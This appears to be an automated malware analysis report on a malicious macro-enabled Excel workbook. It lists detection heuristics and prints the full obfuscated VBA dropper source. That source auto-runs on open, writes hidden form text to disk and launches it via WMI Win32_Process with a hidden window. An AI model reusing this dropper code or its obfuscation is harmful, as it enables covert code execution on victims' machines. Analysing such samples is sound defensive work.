MALICIOUS
108
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The OOXML file contains VBA macros, specifically a Workbook_Open macro, which is a common technique for executing malicious code upon opening the document. The presence of a GetObject call and p-code auto-execution further indicates malicious intent. The script's obfuscated nature and truncated content prevent a definitive analysis of its exact payload, but the overall pattern suggests it's designed to download and execute a secondary malicious component.
Heuristics 4
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set wPozVwdmPCyEXp = GetObject(sYOpFddrVYp.w_nVLDlp).SpawnInstance_ -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open()
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8439 bytes |
SHA-256: 275054aa8ec129c8e42e57802dc36607e01dc1168415e78d832e7e1e702e6c90 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
BTSmHc_0HEZmv = IsError(IsError(hfa9mGb))
IsArray (IsDate(XVt8YS))
SwIOWWI = IsMissing(IsNumeric("WNwwBiH"))
lOqWUpdEspdvLsbu.s_i_F_zogoHJF_QwGHD
IsMissing (IsArray(EGQllY6))
IsDate ("UXbYPF_Sfp9Qd")
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "lRdQ_mtBs"
Function kq_aDivOmaPBNgXoNH_ZZFdVw()
s2z1nec_vEz0Pg = IsDate("W9mPqe_poJkR")
IQSAEoEbdK30K = IsObject(wOuVeV_ImyuDn)
IsNull (IsDate(GsqS0S))
kq_aDivOmaPBNgXoNH_ZZFdVw = Range("FM125")
v9j2X6_oeUrXf = IsDate(IsNumeric("c8t5Xxb_pVSR0Y"))
MJXbzqb = IsEmpty("vM5dck1_WgVOV")
IsEmpty ("QEwqVWP_7wTvv")
End Function
Function aODjNGONvsH()
wuLow7 = IsArray(tjoZL5)
l9vLq9 = IsDate(IsArray("G2MFCzd"))
vcmSOSwEmOQp = Chr(CLng((Not -103))) _
IsNull (IsNull(G2SazMC))
gkn_mBrlMwcflnwtxuA = Chr(CLng((Not -33))) _
xHWHsoDqLfxolJxaPpOyPygqf = Chr(32)
Lr_wbEjNYjSINiJizp = Chr(CLng((((-876 + 31#) - -264#) - -697))) _
IsObject (IsDate("gqv7RS4jqguS"))
HkcVgZPJzeYyDF__pREYsRS = Chr(CLng((Not -115)))
IsNull (OcAlSZ)
dU_RPfrAAv = ChrW(116)
ZjLLgXe_fitdA = IsDate(uSuTQ1_sOn8k5)
GfNUSENs_EssE = Chr(58)
ZKgAXorw_hKYJa = Chr(CLng(((-1.06566820276498E-03 * (0.24390243902439 * 861)) * -496)))
sFrMWAI = Chr(CLng((Not (0.147692307692308 * (144 + -469#)))))
NISqumCQCJkxgWmrBOcGB_c = ChrW(CLng(((-0.508196721311475 * -61) Xor 124)))
kd3Lb0_L7NGI = IsMissing(IsNull(NjxfO1C))
nKrauOIJPOcnno_eJ_LNsH = Chr(CLng((-0.209503239740821 * -463)))
AzGgWz8_XrjWxI = IsDate(IsNumeric(YV2sUZ7_qnj3la))
yVhpl_K_YiPPX_LfwRrsC_bEJSwcW = Chr(CLng((503 - xlDialogChartAddData))) _
XKMY_DCehdlbH = ChrW(CLng((125 And xlPyramidBarClustered))) _
ZBYUhBIQRvcfh = ChrW(101)
Rt2kpLa7fNYeR = IsEmpty(IsDate("UfDfc6w_TbcqdT"))
aODjNGONvsH = ChrW(119) _
+ XKMY_DCehdlbH + ChrW(CLng(((-1075 - -740#) - -440))) + NISqumCQCJkxgWmrBOcGB_c + gkn_mBrlMwcflnwtxuA + ZKgAXorw_hKYJa + ChrW(CLng((-313 - -428))) _
+ xHWHsoDqLfxolJxaPpOyPygqf + Chr(103) + ZBYUhBIQRvcfh + dU_RPfrAAv + Chr(CLng(((1265 - 244#) + (-560 - 429#)))) + sFrMWAI + vcmSOSwEmOQp + yVhpl_K_YiPPX_LfwRrsC_bEJSwcW + HkcVgZPJzeYyDF__pREYsRS + ChrW(109) _
+ nKrauOIJPOcnno_eJ_LNsH + Lr_wbEjNYjSINiJizp + GfNUSENs_EssE
YJPkQQ = IsMissing(IsObject("xcXzU3_H0VKRQ"))
IsMissing (EpO4HUseDIzsQ)
IsMissing (IsNumeric("lYw16b_B1otN"))
End Function
Attribute VB_Name = "sYOpFddrVYp"
Function ihtkTUBPUpLFqNviPkhajZT()
IsNull (IsNull(OSlm0e))
IsDate ("IoY4Trx")
cOEZTzkDYPfhH = IsObject(rsrGo1U0fXc)
IsError (IsNumeric("hnVhdBgF6o23x"))
IsEmpty (IsError(RMzj0G))
IsDate (IsObject(HfWT6Bc_oIWZRk))
aUDGLGqKn_QHDaJFrpXCYnuFgMw_h = lRdQ_mtBs.kq_aDivOmaPBNgXoNH_ZZFdVw
GTno0T = IsEmpty("Gkm8vB7Axyuf")
IsMissing ("Mgci3wzX5spH")
Twmdyh_iIL00M = IsMissing("M0JkCp_1zOvCP")
ihtkTUBPUpLFqNviPkhajZT = aUDGLGqKn_QHDaJFrpXCYnuFgMw_h
IsError (IsMissing(MerAtNuIUi2e))
IsObject (UUKlz1d)
IsArray ("GV4RDGv")
End Function
Function w_nVLDlp()
IsNumeric ("ecJpXrv")
IsDate (tMrvm6juM3w)
tZS07tC = IsDate(IsNumeric("ANj0tg0qLDRe6"))
jjEWMvpYolnCPH_cXgfIougCbze = Mid("VFiMTh\winmgmts:\root\cimv2:Win32_Pr<2iv)", 8, 29)
IsDate ("TlVm85h")
dHXd9i = IsArray(IsDate(YSuddc_dqR3wo))
IsArray ("VSb7cj")
IsError (IsNull("JEK8235_Ay1PT"))
ngPXnDG_nnLKxL = IsEmpty(BBznYjbtprh)
W4krvLj = IsDate("SmJJCXE_yo8RxB")
IsNull (IsDate("l0EMOe_b44DS"))
RFsmAEnwoQ = Range("CO77")
w_nVLDlp = Join(Array(jjEWMvpYolnCPH_cXgfIougCbze + RFsmAEnwoQ))
IsError (owdiSUY)
UOX20mnA9OT0 = IsMissing("UNG7BSo")
V9x4Ki_vy54oK = IsObject("WpXr16jnykmN")
End Function
Attribute VB_Name = "suZjjqhMIKKwO_XfJ_Np"
Attribute VB_Base = "0{6F4FE49F-E257-450C-A73F-3CFDF6F789DB}{F79837EC-6EC8-4426-AFBE-D63B94D0EA61}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function wPozVwdmPCyEXp()
L6lNSM = IsError(IsError("MMJbgGO"))
LA9cqFeN5LUE = IsEmpty(XqWEQawSgl15H)
IsError ("CPgp4isTujS")
Set wPozVwdmPCyEXp = GetObject(sYOpFddrVYp.w_nVLDlp).SpawnInstance_
IsArray ("X0updT_Uenzi")
IsDate (IsObject("pkwQS8"))
WNEIVhC = IsDate("yVwDZI_BH3LyQ")
With wPozVwdmPCyEXp
.ShowWindow = CLng(((-472 + 484#) Xor xlDataAndLabel))
End With
IsError (WpYzc3k652Qz)
fI7LHOkx2lUkE = IsError("Lg8bro")
YLAredV = IsNumeric(S60mxw_N0nSD)
End Function
Attribute VB_Name = "LAlDWGOQh_arnMxEPVSw"
Attribute VB_Base = "0{CD263F86-6132-4392-8A3C-34923620D19A}{AD82E8DB-79E2-4999-9815-8C7581EDF9EF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function CmRyWYgMDoOOXfWblq_Y_r_dHlG()
IsEmpty (IsEmpty("FOjyjEc"))
IsDate ("NQXKvzl0ESO")
IsDate (IsDate(VsIjNK))
kWO9ncG = IsEmpty(BXdIK9_ZVwve)
IsEmpty (IsDate(FMvEFB))
FxcjEEIVgvsz = Chr(CLng((xlDialogActivate And xlDialogRowHeight)))
lqd_HWIuNky = ChrW(CLng((124 And 118)))
Y44putM = IsArray(IsNull("G4qJPt2lki3N"))
PP_BNPJV_P = Chr(118)
dtewQVe5pXIu = IsMissing(CUhhvk)
h_MxpribSNKmNsKxeqYOXRXIaEEkT = ChrW(92)
IsArray (DCFjxV)
B_MPcUiZfsnSMupY = ChrW(CLng((Not -59)))
NyCOxW = IsDate(IsMissing("NkHtt0"))
WZ6qwN = IsEmpty(IsEmpty("LlA1m0evJAC"))
CmRyWYgMDoOOXfWblq_Y_r_dHlG = ChrW(CLng((0.113225499524263 * ((0.699046754425783 * 2203) - 489#)))) + ChrW(105) + Chr(110) _
+ Chr(CLng((Not (xlDialogWorkgroup + (-1263 + 954#))))) + FxcjEEIVgvsz + ChrW(CLng((((-655 - -633#) + 735#) - 604))) _
+ ChrW(CLng((Not (-658 - -541#)))) + ChrW(115) + ChrW(CLng(((1213 + -340#) + (-941 - -126#)))) _
+ Chr(114) _
+ Chr(111) + Chr(CLng(((-1.25027455353372E-04 * -981) * 905))) + lqd_HWIuNky + h_MxpribSNKmNsKxeqYOXRXIaEEkT + ChrW(CLng((xlDialogFormulaFind - -35))) + Chr(CLng((xlExcel3 Xor 116))) + Chr(CLng(((xlDialogTabOrder - 297#) Xor (1.32013201320132E-02 * 909)))) + PP_BNPJV_P + ChrW(CLng((Not -51))) + B_MPcUiZfsnSMupY + Chr(CLng((-471 - -558))) + Chr(CLng((xlConeCol And xlDialogRowHeight))) + Range("HF116") + Replace(",/5cC,/5cC,/5cC,/5cCProcess", ",/5cC", "") _
IsMissing (IsDate("U7qekmk"))
MloBIOq_9fp5M = IsArray("GedR3Gf")
IsDate (IsArray("Bxq5GBb"))
End Function
Attribute VB_Name = "lOqWUpdEspdvLsbu"
Function s_i_F_zogoHJF_QwGHD()
Dim hqRREKewYDJToW_Pe_pG_IOaAqXxj As String
A2WOgLX_AMhn2 = IsMissing(IsEmpty("XegRZUZShB6"))
IsEmpty (IsDate("xIg4ogv"))
hqRREKewYDJToW_Pe_pG_IOaAqXxj = Replace(suZjjqhMIKKwO_XfJ_Np.Lk_MlbhdEixFU_ioQgheowZg.Text, "viXKLi;kOJt!", "")
Qslv4b_lyrmWE = IsEmpty(IsError("IO2OlE_jt1aVY"))
IsEmpty (DzFBzM)
ZhALScm_TBMak = IsMissing(OodALZ)
Open Application.ActiveWorkbook.Path & sYOpFddrVYp.ihtkTUBPUpLFqNviPkhajZT For Binary As #CLng((xlSpeakByColumns Xor xlDone))
L0Qz8Efc1X9Jt = IsArray(IsDate(SgftKYh))
Z3e0YHKTlMi = IsMissing(IsNumeric(Vb6tqf_FMQzC1))
Put #CLng((xlArrowHeadLengthShort And xlArabicStrictAlefHamza)), , hqRREKewYDJToW_Pe_pG_IOaAqXxj
IsNull (IsEmpty("Tx8TXme"))
wDr3w0o = IsArray("Rh3Cx97_T0GCse")
Close #CLng(((xlDialogFileSharing + -570#) - -90))
IsEmpty ("g9ZDy8gjipKP")
IsNull (IsArray(D93cV5))
bNeQcrNhumRjV_pbFLQR_f
IsObject (IsDate(JWXxEB))
IsError (IsNumeric("Zy23jm_PREdgt"))
End Function
Function bNeQcrNhumRjV_pbFLQR_f()
PAH0U6F = IsDate(SN0jlRUa2fp5)
EmUbBmq = IsArray(IsObject("NU4nKG"))
IsError (IsNull(Rrceccx))
With GetObject(LAlDWGOQh_arnMxEPVSw.CmRyWYgMDoOOXfWblq_Y_r_dHlG)
.Create lRdQ_mtBs.aODjNGONvsH & Chr(34) & Application.ActiveWorkbook.Path & sYOpFddrVYp.ihtkTUBPUpLFqNviPkhajZT & Chr(34), Null, suZjjqhMIKKwO_XfJ_Np.wPozVwdmPCyEXp
End With
IsNumeric (IsObject("Llm8Ukq"))
NnZXSAU = IsArray(JuWuijT)
ErB1uN8_e8eE1S = IsNull(IsMissing(xiKX72))
IsNull (IsError(egZDybRiGDVZ))
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 57344 bytes |
SHA-256: 13e9bca0e36e93585fa70e507fa2b11f33ce395a1c52b32aac3bfde85968288b |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.